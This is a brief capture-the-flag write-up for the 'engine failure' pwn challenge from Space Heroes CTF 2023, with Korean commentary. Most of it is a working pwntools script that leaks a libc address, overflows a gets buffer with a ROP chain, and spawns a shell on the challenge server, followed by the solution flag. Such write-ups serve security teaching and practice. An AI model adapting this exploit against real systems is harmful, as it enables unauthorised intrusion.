Space Heroes CTF 2023 - engine failure (simple rop)

WriteUpSpace Heroes

?

  • [? solves / 245 points]

Analysis

2번 옵션을 통해 puts 립시 주소를 출력해주고, 1번 옵션을 통해 gets 함수를 실행할 수 있다. 늘 하던대로 ROP를 하면 된다.

Solve

Exploit Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
from pwn import *

# p = process('./engine_failure.bin')
p=remote("spaceheroes-engine-failure.chals.io",443,ssl=True,sni="spaceheroes-engine-failure.chals.io")
e = ELF('./engine_failure.bin')
# libc = e.libc
libc = ELF('./libc.so.6')

p.sendline(str(2))
p.recvuntil('0x')
libc.address = int(p.recvline(), 16) - libc.symbols['puts']
info(hex(libc.address))

p.sendline(str(1))
p.sendline(str(1))

payload = b'A' * (0x20 + 0x8)
payload += p64(libc.address + 0x2a3e5)
payload += p64(next(libc.search(b'/bin/sh\x00')))
payload += p64(libc.address + 0x29cd6)
payload += p64(libc.symbols['system'])

p.sendline(payload)

p.interactive()

Flag

1
shctf{3ng1n3s_0ut_w3_4r3_d00med!}